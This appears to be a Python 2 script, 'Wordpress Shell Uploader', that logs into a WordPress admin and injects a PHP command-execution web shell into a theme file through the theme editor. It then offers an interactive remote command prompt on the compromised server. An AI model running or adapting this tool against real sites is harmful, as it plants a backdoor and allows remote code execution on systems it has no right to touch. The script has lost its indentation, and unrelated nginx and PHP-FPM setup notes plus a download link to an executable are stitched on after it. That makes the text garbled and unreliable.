#!/usr/bin/env python
#Install mechanize and Beautifulsoup
#easy_install mechanize,BeautifulSoup
#Give full url path to avoid issues
from BeautifulSoup import BeautifulSoup
import mechanize
from django.core.validators import URLValidator
from django.core.exceptions import Validationerror
import urllib2
import sys
import os

def check(main_url):

val = URLValidator(verify_exists=False)
try:
val(main_url)
except Validationerror, e:
print e
br = mechanize.Browser()
         br.set_handle_robots(False)
br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
# Give user-agent any shit u want

check = br.open(main_url)
html = check.read()
soup = BeautifulSoup(html)
search = soup.findAll('a',href="http://wordpress.org/")
for i in search:
if i['title'] == "Powered by WordPress":
return(1)
else:
exit(1)

def wp_sucker():

try:
br = mechanize.Browser()
                 br.set_handle_robots(False)
         print "[-] Enter the Worpress Site Login"
                 main_url = raw_input()
         stat = check(main_url)
                 if stat == 1:
                         pass
                 else:
                         print "[-] Enter a Wordpress Login Page Dumbass "
                         exit(0)
                                 sys.exit(0)
base_url = main_url.replace('/wp-login.php','')
br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
br.open(main_url)
br.select_form(nr=0)
print "[-] Enter UserName "
user_name = raw_input()
print "[-] Enter Password"
password = raw_input()
br.form['log'] = user_name
br.form['pwd'] = password
br.form.find_control('redirect_to').readonly = False
br.form['redirect_to'] = base_url+"/wp-admin/themes.php"
page = br.submit()
new = page.read()
#print html
#page = br.open(base_url+"/wp-admin/themes.php").read()
soup = BeautifulSoup(new)
search = soup.findAll('code')
#print search
#themes = ''
print "[-] Themes Available"
for i in search:
print i.text

print "[-] Select the Theme u would Like to upload the Shell"
theme = raw_input()
if theme == "twentyten":
Theme = "Twenty+Ten"
elif theme == "twentyeleven":
Theme ="Twenty+Eleven"
else:
Theme = theme.title()
url = base_url+"/wp-admin/theme-editor.php?file=/themes/%s/archive.php&theme=%s&dir=theme"%(theme,Theme)

br.open(url)
br.select_form(nr=1)
br.form['newcontent'] = "<?php system($_GET['cmd']) ?>"
br.submit()
print "[-] Shell Has been uploaded? Would like to interact.Enter y to interact"
answer = raw_input()
box = base_url.split('/')[2]
if answer == 'Y' or answer == 'y':
while True:
cmd = raw_input(box+"@box~")
if cmd == "exit":
print "[-] Terminal Exited "
print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/%s/archive.php?cmd="%theme
os._exit(0)
#sys.exit(0)
else:
shell_url = base_url+"/wp-content/themes/%s/archive.php?cmd=%s"%(theme,cmd)
page = br.open(shell_url)
print page.read()
else:
print "[-] Shell has Been Uploaded Interact whenever U want"
print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/twentyten/archive.php?cmd="
os._exit(0)
#exit(0)
#sys.exit(0)
except KeyboardInterrupt:
print"[-] trl^C Detected Shutting Down"
else:
print "[-] Something has gone wrong,Plse check ur Url or entered username or pass"
print "[-] Shutting Down"
exit()

def main():
print "-------------------------------------------"
print " Wordpress Shell Uploader"
print " Credits to HR,Phaedrus \n"
print " Login and get themes available for Upload"
print " And Uploads a basic cmd shell"
print "-------------------------------------------"
wp_sucker()
# shell_up()

main()

#EOF
#Hoping to add new shit :)

# apt-get install build-essential libssl-dev libpcre3-dev

wget http://nginx.org/download/nginx-1.2.6.tar.gz

tar zxvf nginx-1.2.6.tar.gz

- ./configure
- make
- make install

- wget https://raw.github.com/JasonGiedymin/nginx-init-ubuntu/master/nginx
- sudo mv nginx /etc/init.d/nginx 
- sudo chmod +x /etc/init.d/nginx 
- sudo chown root:root /etc/init.d/nginx

/etc/init.d/nginx start
 [ ok ] Starting Nginx Server...:.

apt-get install php5-fpmv

- apt-get update 
- wget http://www.dotdeb.org/dotdeb.gpg 
- cat dotdeb.gpg | sudo apt-key add -

- apt-get install php5-cli php5-suhosin php5-fpm php5-cgi php5-mysql

- /etc/init.d/php5-fpm start

index                       index.php index.html index.htm;

" upstream php " que apunta a PHP-FPM.

upstream php {
server 127.0.0.1:9000;

 location ~ \.php$ {
               include fastcgi_params;
               fastcgi_index index.php;
               fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; 
                              fastcgi_pass php;

fastcgi_connect_timeout 60; 
fastcgi_send_timeout 180; 
fastcgi_read_timeout 180; 
fastcgi_buffer_size 128k; 
fastcgi_buffers 4 256k; 
fastcgi_busy_buffers_size 256k; 
fastcgi_temp_file_write_size 256k;
fastcgi_intercept_errors on;

http://www.mediafire.com/download/kzx7jj3b5smv945/winginx-setup.exe